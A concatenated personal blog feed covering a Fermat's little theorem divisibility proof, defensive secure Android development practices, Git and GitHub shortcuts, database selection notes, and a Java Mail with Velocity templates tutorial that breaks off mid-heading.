<p>From Fermat’s little theorum we know that <span class="math inline"><em>a</em><sup>(<em>p</em>−1)</sup><em>k</em> ≡ 1 (mod <em>p</em>)</span>
if <span class="math inline"><em>a</em> (mod <em>p</em>) ≠ 0</span> and
k is a natural number.</p>
<blockquote>
<p>The trick here is to make the power same as <span class="math inline">(<em>p</em>−1)</span></p>
</blockquote>
<p>we know that, <span class="math inline">5<sup>(31−1)<sup>1000</sup></sup> = (5<sup>30</sup>)<sup>1000</sup></span></p>
<p>Rewriting the modular equation similar to Fermat’s little theorum
<span class="math inline">(5<sup>30</sup>)<sup>1000</sup> ≡ 1 (mod 31)</span></p>
<p>For the second part, dividing 12346 by 30 gives a reminder of 6 and a
divisor of 4115. So the second part of the equation can be rewritten as,
<span class="math inline">6123456 = (6<sup>6</sup>)(6<sup>30</sup>)<sup>4115</sup></span></p>
<p>Using the Fermats little theorum <span class="math inline">(6<sup>30</sup>)<sup>4115</sup> ≡ 1 (mod 31)</span></p>
<p>That leaves, <span class="math inline">(6<sup>6</sup>) (mod 31)</span> to be computed.</p>
<p>Breaking this further,</p>
<p><span class="math inline">6<sup>6</sup> ≡ (6<sup>2</sup>)(6<sup>2</sup>)(6<sup>2</sup>) (mod 31)</span></p>
<p><span class="math inline">6<sup>6</sup> ≡ (5)(5)(5) (mod 31)</span></p>
<p><span class="math inline">6<sup>6</sup> ≡ 125 (mod 31)</span></p>
<p><span class="math inline">6<sup>6</sup> ≡ 1 (mod 31)</span></p>
<p>So the difference between <span class="math inline">5<sup>30000</sup></span> and <span class="math inline">6<sup>123456</sup></span> being divisible by 31 is
simply written as, <span class="math inline">1 (mod 31) − 1 (mod 31) = 0 (mod 31)</span> which
implies that it is indeed divisible by 31.</p>Steps for secure Android Application development2015-03-22T00:00:00-07:002015-03-22T00:00:00-07:00Senthilkumar Gopaltag:sengopal.github.io,2015-03-22:/posts/steps-for-secure-android-application-development.htmlIn a recent working session, some of the best practices for a secure Android application development were discussed. Following were some of the important aspects of the discussion. Other the usual standards of securing the APK and securing the server-side components, some of the development and secure coding practices are listed in this post.<p>In a recent working session, some of the best practices for a secure
Android application development were discussed. Following were some of
the important aspects of the discussion. Other the usual standards of
securing the APK and securing the server-side components, some of the
development and secure coding practices are listed in this post. Its the
responsibility of every Android app developer to keep themselves
appraised about new threats using OWASP Mobile Top 10 Risks.</p>
<h3 id="data-classification-and-handling-standards">Data classification
and Handling Standards</h3>
<ol type="1">
<li>All data persisted should be encrypted - sqlliteDB, files,
dataprovider etc.,</li>
<li>Don’t transmit sensitive data to unapproved 3rd party.</li>
<li>Don’t put sensitive data into Intents</li>
</ol>
<h3 id="mobile-privacy">Mobile privacy</h3>
<ol type="1">
<li>Respect user’s privacy by collecting minimum amount of data</li>
<li>GPS & location data - fine grain vs. coarse grain GPS data</li>
<li>Contact Info</li>
<li>Microphone and Camera use</li>
<li>Tracking and Analytics IDs</li>
</ol>
<h3 id="attack-surface-analysis">Attack Surface Analysis</h3>
<ol type="1">
<li>Third party code automatically inherits app permissions. Treat new
versions of library as a new version of your app.</li>
<li>Use Google Alerts for any security disclosures regarding the 3rd
party library.</li>
</ol>
<h3 id="securing-logs">Securing logs</h3>
<ol type="1">
<li>Do not enable crash logs by default. Get user consent before
logging.</li>
<li>Do not store crash logs for too long</li>
<li>Do not send plain-text logs over HTTP</li>
<li>Mask sensitive user information in the logs - starbucks usecase</li>
<li>Minimize the number of permissions - dont ask for what you dont need
- Incoming SMS messages -</li>
</ol>
<h3 id="securing-intents">Securing Intents</h3>
<ol type="1">
<li>Use PendingIntents as delayed callbacks to private Broadcast
receivers</li>
<li>Use Explicit intents as much as possible</li>
</ol>
<div class="sourceCode" id="cb1"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb1-1"><a aria-hidden="true" href="#cb1-1" tabindex="-1"></a>context<span class="op">.</span><span class="fu">sendBroadcast</span><span class="op">(</span>intent<span class="op">,</span><span class="st">"custom-permission"</span><span class="op">);</span></span>
<span id="cb1-2"><a aria-hidden="true" href="#cb1-2" tabindex="-1"></a>context<span class="op">.</span><span class="fu">startActivity</span><span class="op">(</span>intent<span class="op">);</span></span></code></pre></div>
<h3 id="permissions-and-intents">Permissions and Intents</h3>
<ol type="1">
<li>Use custom permission for 3rd party or other apps to subscribe for
notifications</li>
<li>For sensitive activities, set FLAG_SECURE constant flag in
WindowManager.LayoutParams</li>
<li>Perform intent data validation</li>
<li>For private activities, use explicit intent</li>
<li>Seperate services in AndroidManifest with explicit and seperate
permissions</li>
<li>Use explicit intent to call Service</li>
<li>Use <code>checkCallingPermission()</code> to verify if permission is
available to the caller</li>
</ol>
<h3 id="data-security">Data Security</h3>
<ol type="1">
<li>Use record level delegation feature to share a specific record or
file without sharing the entire database to provide minimum access.</li>
<li>Never trust the parameters passed to content providers. Sanatize for
injection attacks.</li>
<li>Securing ContentProviders. Always set <code>exported=false</code> in
your <strong>AndroidManifest.xml</strong></li>
<li>Ppecify explicit permissions for reading and writing.</li>
<li>Use dynamic <code>grantUriPermissions</code> attribute to true to
grant permission for certain portion for certain amount of time.</li>
</ol>
<h3 id="webview-security">WebView Security</h3>
<ol type="1">
<li>Disable JS and Plugin support if not needed</li>
<li>No local file access</li>
<li>Do not load 3rd party hosts unless validated</li>
<li>Do not follow redirect requests in the server response unless
validated</li>
<li>If possible, use only https</li>
<li>Disable form auto-fill feature by using
<code>WebView.WebSettings.setSaveFormData()</code> as false</li>
<li>Reject unexpected content - only allow HTML for main page (reject
PDFs etc.,)</li>
<li>Secure Page Rendering in WebView - shouldOverrideUrlLoading</li>
<li>Access Modifiers should not be trusted for sensitivity.</li>
<li>Clear the cache after Webview of a Sensitive page.</li>
</ol>
<div class="sourceCode" id="cb2"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb2-1"><a aria-hidden="true" href="#cb2-1" tabindex="-1"></a><span class="fu">onPageFinished</span><span class="op">(</span>Webview view<span class="op">,</span> <span class="bu">String</span> Url<span class="op">){</span></span>
<span id="cb2-2"><a aria-hidden="true" href="#cb2-2" tabindex="-1"></a> view<span class="op">.</span><span class="fu">clearCache</span><span class="op">(</span><span class="kw">true</span><span class="op">);</span></span>
<span id="cb2-3"><a aria-hidden="true" href="#cb2-3" tabindex="-1"></a><span class="op">}</span></span></code></pre></div>
<ol start="11" type="1">
<li>Ensure that UI Redressing (a.k.a) Tap jacking protection is setup to
prevent click jacking Use
<code>setFilterTouchesWhenObscured(true)</code> or
<code>android:setFilterTouchesWhenObscured</code> for activity
declaration.</li>
</ol>
<h3 id="development-practices">Development practices</h3>
<ol type="1">
<li>Keep sensitive data in RAM no longer than required such as
Encryption keys, Authn, Authz tokens, passwords.</li>
<li>Variables should be nullified after use</li>
<li>Use byte[] and char[] for sensitive data rather than Strings which
helps in cleaning easier.</li>
</ol>
<h3 id="internal-storage">Internal Storage</h3>
<ol type="1">
<li>Accessible only to your app</li>
<li>clean the cache using deleteFile()</li>
</ol>
<h3 id="external-storage">External Storage</h3>
<ol type="1">
<li>Globally readable and writable</li>
<li>Can be physically removed</li>
<li>Avoid using this storage for sensitive apps in general. Use
<code>preferInternal</code> to prevent app being installed in external
storage.</li>
<li>Use Keychain API for system wide credentials</li>
<li>Use Keystore to stores its own credentials</li>
<li><code>file.delete()</code> does not securely delete.</li>
<li>Always delete cache files when user logs out</li>
<li>Do not keep files with any sensitive data any longer than absolutely
needed.</li>
<li>Do not create files with MODE_WORLD_READABLE or writeable</li>
<li>Do not use modes such as 0666, 0777, 0663 with chmod binary or
syscalls accepting a file modes</li>
<li>Only share info using content providers instead of file system</li>
</ol>
<h3 id="cryptography">Cryptography</h3>
<ol type="1">
<li>Dont store plain-text secret key</li>
<li>Never roll your own CRYPTO libraries. use the approved ones</li>
<li>Never store secrets using string - only char[] and byte[]</li>
<li>Never seed SecureRandom</li>
</ol>
<h3 id="camera-feed">Camera feed</h3>
<ol type="1">
<li>Use default CAmera app/services</li>
<li>Or, create SurfaceView to display a Camera Preview and click button
to convert to Picture</li>
</ol>
<h3 id="url-connections">URL Connections</h3>
<ol type="1">
<li>Use TLS instead of SSLv3.</li>
<li>Use only https</li>
<li>SSLSocket class can be used but with caution. It does not do
hostname verification.</li>
<li>If overriding, check <code>getDefaultHostNameVerifier()</code> or
<code>HostNameVerifier.verify()</code> returns boolean true.</li>
</ol>Git and Github secrets2014-01-23T00:00:00-08:002014-01-23T00:00:00-08:00Senthilkumar Gopaltag:sengopal.github.io,2014-01-23:/posts/git-and-github-secrets.htmlSome git and github usage secrets for quick reference.<p>Git commandline and Github are two of most used tools for a web
developer. Especially in a team environment, we use these more than a
few times in a day. Recently I came across a screencast held at Aloha
Ruby Conference. Some of the important and amazing shortcuts and useful
tips discussed were summarized below. Rather than using them all, we
should start couple of them and start practising them which definitely
improves our tooling and productivity.</p>
<h3 id="github">Github</h3>
<p><strong>Adding .diff or .patch to the URL provides more clearer
textual representation</strong></p>
<div class="sourceCode" id="cb1"><pre class="sourceCode html"><code class="sourceCode html"><span id="cb1-1"><a aria-hidden="true" href="#cb1-1" tabindex="-1"></a> https://github.com/sengopal/sengopal.github.com/commit/c1ed8ca37880bb6b369e5007fa88909aa1b73189</span>
<span id="cb1-2"><a aria-hidden="true" href="#cb1-2" tabindex="-1"></a> https://github.com/sengopal/sengopal.github.com/commit/c1ed8ca37880bb6b369e5007fa88909aa1b73189.diff</span>
<span id="cb1-3"><a aria-hidden="true" href="#cb1-3" tabindex="-1"></a> https://github.com/sengopal/sengopal.github.com/commit/c1ed8ca37880bb6b369e5007fa88909aa1b73189.patch</span></code></pre></div>
<p><strong>Remove Whitespace differences using</strong>
<code>?w=1</code></p>
<p><strong>Cool octocat images @ octodex.github.com</strong></p>
<p><strong>URL Shortner : git.io</strong> Usage:
<code>gitio <url> <name?</code></p>
<p><strong>Lexer and Highlighting Languages:</strong> <a href="https://github.com/github/linguist" title="Linguist">Linguist</a></p>
<p><strong>Gist as Screenshot sharing and discussion tool</strong>
<code><https://gist.github.com/></code></p>
<p><strong>Git + Hub super commands</strong> Hub is a command line tool
that wraps git in order to extend it with extra features and commands
that make working with GitHub easier. <a href="https://github.com/defunkt/hub" title="hub repo">hub repo</a></p>
<p><strong>Key Shortcuts</strong> Press in repo page <code>t</code> -
for File Finder <code>w</code> - branch selector <code>s</code> - quick
search</p>
<p><strong><span class="citation" data-cites="mention__">(<strong>mention__?</strong>)</span> - adds
person to the conversation </strong>@Organization/Team__ - adds the
organization/team to the conversation</p>
<p><code>#<number></code> - <strong>autolinks to issue
number</strong> Example: using a commit message such as “closes
<code>#1291</code>” autolinks to the issue</p>
<p><strong>Adding</strong> <code>?author=sengopal</code> <strong>or
email address to</strong> <code>github.com/repo/commits/master</code>
<strong>gives the list of commits by that author.</strong></p>
<p>Example:
https://github.com/sengopal/immuno/commits/master?author=sengopal</p>
<p><strong>Pulls needn’t be from a fork, but can be done from branches
as well</strong></p>
<p><strong>Github supports emoji’s which are available under</strong> <a href="http://emoji-cheat-sheet.com" title="Emoji-cheat-sheet">Emoji-cheat-sheet</a></p>
<h3 id="git-line-quirks">Git line quirks</h3>
<ol type="1">
<li><p><code>git branch --merged</code></p></li>
<li><p><code>git branch --no-merged</code></p></li>
<li><p><code>git branch --contains <sha></code> - which branch has
this SHA</p></li>
<li><p><code>git checkout <branch_name> --<path to file></code>
- checkout that file from that branch into your current branch</p></li>
<li><p><code>git log branchA ^branchB</code> - commits in A not in
B</p></li>
<li><p><code>git fsck ==lost-found</code></p></li>
<li><p><code>git diff HEAD^ --stat</code></p></li>
<li><p><code>git blame -w</code> - to avoid whitespace as
commits</p></li>
<li><p><code>git blame -M</code> - original commit and not the move
commit</p></li>
<li><p><code>git blame -C</code> - same as M except looks in the same
commit <em>-CC, -CCC are the other variations available</em></p></li>
<li><p><code>git status -sb</code></p></li>
<li><p><code>git diff HEAD^ --word-diff</code></p></li>
<li><p><code>git config --global help.autocorrect 1</code></p></li>
<li><p><code>git config --global rerere.enabled 1</code> - long running
branches, remembers merge conflicts</p></li>
<li><p><code>git config --global color.ui 1</code></p></li>
<li><p><code>git-amend</code> - alias to
<code>git commit --amend -C HEAD</code></p></li>
<li><p><code>git undo</code> - alias to
<code>git reset --soft HEAD^</code> - retains commit as staged</p></li>
<li><p><code>git-count</code> - alias to
<code>git shortlog -sn</code></p></li>
<li><p><code>git add -p</code> - useful for logical commits</p></li>
<li><p><code>git show :/<query></code> - checks for the message or
file name</p></li>
</ol>
<p><strong>Commit Comparison</strong></p>
<p>LINE Linking - #L16, #L16-25</p>
<p><em>Advanced Compare View</em></p>
<p>Range - <code>MASTER@{1.day.ago}...MASTER</code> bookmark that page
and see whats team upto in last 12 hours</p>
<h3 id="key-git-commands-in-order-of-importance">Key Git commands in
order of importance</h3>
<ul>
<li>Clone – Creates a repository from a network or local location</li>
<li>Status – What is staged, and in the working directory</li>
<li>Log – history of commits</li>
<li>Add – make a file ready for staging</li>
<li>Commit – Move staged files to a commit</li>
<li>Reset – Clean an entire working directory</li>
<li>Pull – Perform a fetch & merge operation</li>
<li>Push – send your changes to the parent repository</li>
<li>Branch – to create a new branch</li>
<li>Checkout – to grab one or more files</li>
<li>Clean – removing files that exist only in the working directory</li>
<li>Fetch – Get changes from the parent repository to store within the
current repo</li>
<li>Merge – Combine two or more commits into one</li>
</ul>Eight steps in choosing a database2014-01-20T00:00:00-08:002014-01-20T00:00:00-08:00Senthilkumar Gopaltag:sengopal.github.io,2014-01-20:/posts/eight-steps-in-choosing-a-database.htmlThis post chronicles the list of steps that were followed for selecting a database based on its attributes and capabilities<p>We are planning a database architecture rewrite for an existing
service and the needs of the project are:</p>
<ol type="1">
<li>Consistent data with ACID compliance for LIVE data</li>
<li>Async writes and random reads for metadata</li>
<li>Fast and Async writes and very low reads for audit information</li>
</ol>
<p>Usually, experts suggest a multi-database solution, or polyglot
persistence approach instead of a traditional monolithich RDBMS
solution.</p>
<h3 id="disadvantages-of-rdbms">Disadvantages of RDBMS</h3>
<p>Scaling a traditional RDBMS is difficult at best. Partitioning
schemes, multi-master configurations, and redundancy systems offered by
Oracle, SQL Server, and DB2 are expensive and problematic at best. They
often fail to meet the needs of high-scale applications. Also, for short
lived data and with different lifetime data, RDBMS does not fit the
needs of such an application.</p>
<h2 id="available-databases">Available Databases</h2>
<p>Some of the database types available as per this <a href="https://dzone.com/articles/review-persistence-strategies">Dzone
article</a> are:</p>
<h3 id="key-value-stores">Key-Value stores</h3>
<p>The most commonly used database solutions are Key-Value stores such
as Aerospike, Redis, and Riak. These are available for easier install
and application implementation.</p>
<h3 id="column-family-databases">Column-Family databases</h3>
<p>The other common databases available are Cassandra and HBase are both
based on Hadoop but have different write semantics. While HBase offers
strong write integrity and Cassandra offers <em>eventual
consistency</em>. Also, Cassandra is ideal for high intense writes and
random reads.</p>
<h3 id="document-databases">Document Databases</h3>
<p>Document databases scale quite well and are great for web-based
operational systems that operate on a single big entity, or systems that
don’t require transactional integrity across entities. Typically,
MongoDB and Couchbase are typically the leaders in this sector.</p>
<h3 id="graph-databases">Graph Databases</h3>
<p>Social networks and recommendation systems are classic use cases for
graph databases, but there are a few different types of graph databases.
Some of them are custom made for operational purposes (Neo4j) while
others are aimed more at analytics (Apache Giraph).</p>
<p>Using the above descriptions and also based on availability or
support within our organization, the following database types were
determined.</p>
<table>
<thead>
<tr class="header">
<th>Database</th>
<th>Storage for</th>
</tr>
</thead>
<tbody>
<tr class="odd">
<td>Oracle</td>
<td>Partition scheme. Store Live data.</td>
</tr>
<tr class="even">
<td>Cassandra</td>
<td>Heavy writes for Async metadata</td>
</tr>
<tr class="odd">
<td>Cassandra</td>
<td>Heavy writes for Audit log</td>
</tr>
</tbody>
</table>Java Mail Made Easy using Velocity Templates2010-10-01T00:00:00-07:002010-10-01T00:00:00-07:00Senthilkumar Gopaltag:sengopal.github.io,2010-10-01:/posts/java-mail-made-easy-using-velocity-templates.htmlFor an emailing solution we used velocity templates for simpler generation of Java mail templates and data. This post explains the code and the setup to get this in simple steps.<h3 id="introduction-to-velocity">Introduction to Velocity</h3>
<p>Velocity is an open source templating tool developed by an
international volunteer community and hosted by the Apache Software
Foundation’s Jakarta Project. You can download the freely available
source code at the <a href="http://www.javaworld.com/javaworld/jw-12-2001/jw-1228-velocity.html#resources">Jakarta
Velocity</a> Project Website.</p>
<h3 id="simple-velocity-template-example">Simple Velocity Template
Example</h3>
<p>Any application using Velocity requires two parts. The first is the
template</p>
<p><strong>Helloworld.vm</strong></p>
<pre><code> Hello $name! Welcome to Velocity!</code></pre>
<p><strong>HelloWorld.java:</strong></p>
<div class="sourceCode" id="cb2"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb2-1"><a aria-hidden="true" href="#cb2-1" tabindex="-1"></a> <span class="kw">import</span> <span class="im">java</span><span class="op">.</span><span class="im">io</span><span class="op">.</span><span class="im">StringWriter</span><span class="op">;</span></span>
<span id="cb2-2"><a aria-hidden="true" href="#cb2-2" tabindex="-1"></a> <span class="kw">import</span> <span class="im">org</span><span class="op">.</span><span class="im">apache</span><span class="op">.</span><span class="im">velocity</span><span class="op">.</span><span class="im">Template</span><span class="op">;</span></span>
<span id="cb2-3"><a aria-hidden="true" href="#cb2-3" tabindex="-1"></a> <span class="kw">import</span> <span class="im">org</span><span class="op">.</span><span class="im">apache</span><span class="op">.</span><span class="im">velocity</span><span class="op">.</span><span class="im">VelocityContext</span><span class="op">;</span></span>
<span id="cb2-4"><a aria-hidden="true" href="#cb2-4" tabindex="-1"></a> <span class="kw">import</span> <span class="im">org</span><span class="op">.</span><span class="im">apache</span><span class="op">.</span><span class="im">velocity</span><span class="op">.</span><span class="im">app</span><span class="op">.</span><span class="im">Velocity</span><span class="op">;</span></span>
<span id="cb2-5"><a aria-hidden="true" href="#cb2-5" tabindex="-1"></a> </span>
<span id="cb2-6"><a aria-hidden="true" href="#cb2-6" tabindex="-1"></a> <span class="kw">public</span> <span class="kw">class</span> HelloWorld<span class="op">{</span></span>
<span id="cb2-7"><a aria-hidden="true" href="#cb2-7" tabindex="-1"></a> <span class="kw">public</span> <span class="dt">static</span> <span class="dt">void</span> <span class="fu">main</span><span class="op">(</span> <span class="bu">String</span><span class="op">[]</span> args <span class="op">)</span> <span class="kw">throws</span> <span class="bu">Exception</span> <span class="op">{</span></span>
<span id="cb2-8"><a aria-hidden="true" href="#cb2-8" tabindex="-1"></a> <span class="co">/* Get the Template */</span></span>
<span id="cb2-9"><a aria-hidden="true" href="#cb2-9" tabindex="-1"></a> Template t <span class="op">=</span> Velocity<span class="op">.</span><span class="fu">getTemplate</span><span class="op">(</span><span class="st">"Helloworld.vm"</span> <span class="op">);</span></span>
<span id="cb2-10"><a aria-hidden="true" href="#cb2-10" tabindex="-1"></a> <span class="co">/* create a context and add data */</span></span>
<span id="cb2-11"><a aria-hidden="true" href="#cb2-11" tabindex="-1"></a> VelocityContext context <span class="op">=</span> <span class="kw">new</span> <span class="fu">VelocityContext</span><span class="op">();</span></span>
<span id="cb2-12"><a aria-hidden="true" href="#cb2-12" tabindex="-1"></a> context<span class="op">.</span><span class="fu">put</span><span class="op">(</span><span class="st">"name"</span><span class="op">,</span> <span class="st">"World"</span><span class="op">);</span></span>
<span id="cb2-13"><a aria-hidden="true" href="#cb2-13" tabindex="-1"></a> <span class="co">/* now render the template into a StringWriter */</span></span>
<span id="cb2-14"><a aria-hidden="true" href="#cb2-14" tabindex="-1"></a> <span class="bu">StringWriter</span> writer <span class="op">=</span> <span class="kw">new</span> <span class="bu">StringWriter</span><span class="op">();</span></span>
<span id="cb2-15"><a aria-hidden="true" href="#cb2-15" tabindex="-1"></a> t<span class="op">.</span><span class="fu">merge</span><span class="op">(</span> context<span class="op">,</span> writer <span class="op">);</span></span>
<span id="cb2-16"><a aria-hidden="true" href="#cb2-16" tabindex="-1"></a> <span class="co">/* show the World */</span></span>
<span id="cb2-17"><a aria-hidden="true" href="#cb2-17" tabindex="-1"></a> <span class="bu">System</span><span class="op">.</span><span class="fu">out</span><span class="op">.</span><span class="fu">println</span><span class="op">(</span> writer<span class="op">.</span><span class="fu">toString</span><span class="op">()</span> <span class="op">);</span></span>
<span id="cb2-18"><a aria-hidden="true" href="#cb2-18" tabindex="-1"></a> <span class="op">}</span></span>
<span id="cb2-19"><a aria-hidden="true" href="#cb2-19" tabindex="-1"></a> <span class="op">}</span></span></code></pre></div>
<p><strong>Output</strong></p>
<pre><code> Hello World! Welcome to Velocity!</code></pre>
<h3 id="introduction-to-java-mail-api">Introduction to JAVA MAIL
API</h3>
<p>The Java Mail API provides the capability to develop email clients
and mail-enabled Java applications. It supports the creation of
sophisticated user interfaces for mail clients. It includes appropriate
convenience classes, which encapsulate common mail functions and
protocols. It fits with other packages for the Java platform in order to
facilitate its use with other Java APIs. It provides a mail and
messaging framework addition to the Java platform.</p>
<p>Although the Java Mail API contains many more classes than those
discussed here, concentrating on some of the core classes to start with
makes it easy to understand the essence of the API. The following is a
brief description of the core classes:</p>
<h4 id="javax.mail.session">javax.mail.Session</h4>
<p>The javax.mail.Session class is the top-level entry class for the
Java Mail API, and its most commonly used methods provide the ability to
control and load the classes that represent the service provider
implementations (SPI) for various mail protocols (Note: A service
provider is a developer and/or vendor that provides an implementation
for an API; examples of Java Mail API implementations include POP3,
SMTP, and IMAP4 – some are available from Sun, others via third
parties.)</p>
<h4 id="javax.mail.transport">javax.mail.Transport</h4>
<p>The javax.mail.Transport class is another provider-implemented class
and is used for sending a message over a specific protocol.</p>
<h4 id="javax.mail.message">javax.mail.Message</h4>
<p>The javax.mail.Message class is implemented by a provider and models
all the details of an actual e-mail message, such as the subject line,
sender/recipient e-mail address, sent date, and so on. The guidelines
for providers who implement the javax.mail.Message dictate that the
actual fetching of e-mail message components should be delayed as long
as possible in order to make this class as lightweight as possible.</p>
<h4 id="simple-java-mail-example">Simple JAVA Mail Example</h4>
<div class="sourceCode" id="cb4"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb4-1"><a aria-hidden="true" href="#cb4-1" tabindex="-1"></a> <span class="kw">import</span> <span class="im">java</span><span class="op">.</span><span class="im">beans</span><span class="op">.*;</span></span>
<span id="cb4-2"><a aria-hidden="true" href="#cb4-2" tabindex="-1"></a> <span class="kw">import</span> <span class="im">javax</span><span class="op">.</span><span class="im">mail</span><span class="op">.*;</span></span>
<span id="cb4-3"><a aria-hidden="true" href="#cb4-3" tabindex="-1"></a> <span class="kw">import</span> <span class="im">javax</span><span class="op">.</span><span class="im">mail</span><span class="op">.</span><span class="im">internet</span><span class="op">.*;</span></span>
<span id="cb4-4"><a aria-hidden="true" href="#cb4-4" tabindex="-1"></a> <span class="kw">import</span> <span class="im">java</span><span class="op">.</span><span class="im">io</span><span class="op">.*;</span></span>
<span id="cb4-5"><a aria-hidden="true" href="#cb4-5" tabindex="-1"></a> <span class="kw">import</span> <span class="im">java</span><span class="op">.</span><span class="im">util</span><span class="op">.*;</span></span>
<span id="cb4-6"><a aria-hidden="true" href="#cb4-6" tabindex="-1"></a> <span class="kw">public</span> <span class="kw">class</span> MailBean <span class="op">{</span></span>
<span id="cb4-7"><a aria-hidden="true" href="#cb4-7" tabindex="-1"></a> <span class="kw">public</span> <span class="fu">MailBean</span><span class="op">(</span><span class="bu">String</span> from<span class="op">,</span> <span class="bu">String</span> userName<span class="op">,</span> <span class="bu">String</span> subject<span class="op">,</span> <span class="bu">String</span> content<span class="op">){</span></span>
<span id="cb4-8"><a aria-hidden="true" href="#cb4-8" tabindex="-1"></a> <span class="cf">try</span><span class="op">{</span></span>
<span id="cb4-9"><a aria-hidden="true" href="#cb4-9" tabindex="-1"></a> <span class="fu">mail</span><span class="op">(</span>from<span class="op">,</span> userName<span class="op">,</span> subject<span class="op">,</span> content<span class="op">);</span></span>
<span id="cb4-10"><a aria-hidden="true" href="#cb4-10" tabindex="-1"></a> <span class="op">}</span><span class="cf">catch</span><span class="op">(</span>MessagingException e<span class="op">)</span> <span class="op">{}</span></span>
<span id="cb4-11"><a aria-hidden="true" href="#cb4-11" tabindex="-1"></a> <span class="op">}</span></span>
<span id="cb4-12"><a aria-hidden="true" href="#cb4-12" tabindex="-1"></a> <span class="kw">public</span> <span class="bu">String</span> <span class="fu">getBenaInfo</span><span class="op">(){</span></span>
<span id="cb4-13"><a aria-hidden="true" href="#cb4-13" tabindex="-1"></a> <span class="cf">return</span> <span class="st">"A Bean that sends mail"</span><span class="op">;</span></span>
<span id="cb4-14"><a aria-hidden="true" href="#cb4-14" tabindex="-1"></a> <span class="op">}</span></span>
<span id="cb4-15"><a aria-hidden="true" href="#cb4-15" tabindex="-1"></a> <span class="kw">public</span> <span class="dt">void</span> <span class="fu">mail</span><span class="op">(</span><span class="bu">String</span> from<span class="op">,</span> <span class="bu">String</span> userName<span class="op">,</span> <span class="bu">String</span> subject<span class="op">,</span> <span class="bu">String</span> content<span class="op">)</span><span class="kw">throws</span> MessagingException<span class="op">{</span></span>
<span id="cb4-16"><a aria-hidden="true" href="#cb4-16" tabindex="-1"></a> <span class="bu">String</span> smtpHost <span class="op">=</span> <span class="st">"00.00.00.00"</span><span class="op">;</span></span>
<span id="cb4-17"><a aria-hidden="true" href="#cb4-17" tabindex="-1"></a> <span class="co">//start a session</span></span>
<span id="cb4-18"><a aria-hidden="true" href="#cb4-18" tabindex="-1"></a> java<span class="op">.</span><span class="fu">util</span><span class="op">.</span><span class="fu">Properties</span> properties <span class="op">=</span> <span class="bu">System</span><span class="op">.</span><span class="fu">getProperties</span><span class="op">();</span></span>
<span id="cb4-19"><a aria-hidden="true" href="#cb4-19" tabindex="-1"></a> properties<span class="op">.</span><span class="fu">put</span><span class="op">(</span><span class="st">"mail.smtp.host"</span><span class="op">,</span>smtpHost<span class="op">);</span></span>
<span id="cb4-20"><a aria-hidden="true" href="#cb4-20" tabindex="-1"></a> Session session <span class="op">=</span> Session<span class="op">.</span><span class="fu">getInstance</span><span class="op">(</span>properties<span class="op">,</span><span class="kw">null</span><span class="op">);</span></span>
<span id="cb4-21"><a aria-hidden="true" href="#cb4-21" tabindex="-1"></a></span>
<span id="cb4-22"><a aria-hidden="true" href="#cb4-22" tabindex="-1"></a> <span class="co">//Construct a message object</span></span>
<span id="cb4-23"><a aria-hidden="true" href="#cb4-23" tabindex="-1"></a> MimeMessage message <span class="op">=</span> <span class="kw">new</span> <span class="fu">MimeMessage</span><span class="op">(</span>session<span class="op">);</span></span>
<span id="cb4-24"><a aria-hidden="true" href="#cb4-24" tabindex="-1"></a> message<span class="op">.</span><span class="fu">setFrom</span><span class="op">(</span><span class="kw">new</span> <span class="fu">InternetAddress</span><span class="op">(</span>from<span class="op">));</span></span>
<span id="cb4-25"><a aria-hidden="true" href="#cb4-25" tabindex="-1"></a> message<span class="op">.</span><span class="fu">addRecipient</span><span class="op">(</span>Message<span class="op">.</span><span class="fu">RecipientType</span><span class="op">.</span><span class="fu">TO</span><span class="op">,</span><span class="kw">new</span> <span class="fu">InternetAddress</span><span class="op">(</span>userName<span class="op">));</span></span>
<span id="cb4-26"><a aria-hidden="true" href="#cb4-26" tabindex="-1"></a> message<span class="op">.</span><span class="fu">setSubject</span><span class="op">(</span>subject<span class="op">);</span></span>
<span id="cb4-27"><a aria-hidden="true" href="#cb4-27" tabindex="-1"></a> message<span class="op">.</span><span class="fu">setText</span><span class="op">(</span>content<span class="op">);</span></span>
<span id="cb4-28"><a aria-hidden="true" href="#cb4-28" tabindex="-1"></a> message<span class="op">.</span><span class="fu">setSentDate</span><span class="op">(</span><span class="kw">new</span> java<span class="op">.</span><span class="fu">util</span><span class="op">.</span><span class="fu">Date</span><span class="op">());</span></span>
<span id="cb4-29"><a aria-hidden="true" href="#cb4-29" tabindex="-1"></a></span>
<span id="cb4-30"><a aria-hidden="true" href="#cb4-30" tabindex="-1"></a> <span class="co">//connect to transport</span></span>
<span id="cb4-31"><a aria-hidden="true" href="#cb4-31" tabindex="-1"></a> Transport transport <span class="op">=</span> session<span class="op">.</span><span class="fu">getTransport</span><span class="op">(</span><span class="st">"smtp"</span><span class="op">);</span></span>
<span id="cb4-32"><a aria-hidden="true" href="#cb4-32" tabindex="-1"></a> transport<span class="op">.</span><span class="fu">connect</span><span class="op">(</span>smtpHost<span class="op">,</span><span class="st">""</span><span class="op">,</span> <span class="st">""</span><span class="op">);</span></span>
<span id="cb4-33"><a aria-hidden="true" href="#cb4-33" tabindex="-1"></a></span>
<span id="cb4-34"><a aria-hidden="true" href="#cb4-34" tabindex="-1"></a> <span class="co">//send the message and close the connection</span></span>
<span id="cb4-35"><a aria-hidden="true" href="#cb4-35" tabindex="-1"></a> transport<span class="op">.</span><span class="fu">sendMessage</span><span class="op">(</span>message<span class="op">,</span>message<span class="op">.</span><span class="fu">getAllRecipients</span><span class="op">());</span></span>
<span id="cb4-36"><a aria-hidden="true" href="#cb4-36" tabindex="-1"></a> transport<span class="op">.</span><span class="fu">close</span><span class="op">();</span></span>
<span id="cb4-37"><a aria-hidden="true" href="#cb4-37" tabindex="-1"></a> <span class="op">}</span></span>
<span id="cb4-38"><a aria-hidden="true" href="#cb4-38" tabindex="-1"></a> <span class="op">}</span></span></code></pre></div>
<p>As there are a lot of tutorials available for Velocity and Java Mail,
this tutorial deals only with the integration of Velocity for easier and
more customized mailing abilities.</p>
<h3 id="project-usage">Project Usage</h3>
<p>Our Project required nearly fifty different mail formats to be sent
on various stages of the application. The difficult part being that the
templates contained loads of dynamic data. Also these templates were
being updated on a regular basis making it more difficult for developing
the application.</p>
<p>We used Velocity Templates for storing the design and the layout of
the mail which needs to be sent and used them for integrating the
dynamic attributes into the layout and hence providing a seamless
abstraction between the presentation and the business layer.</p>
<h2 id="step-by-step-explanation-of-the-code">Step-by-Step Explanation
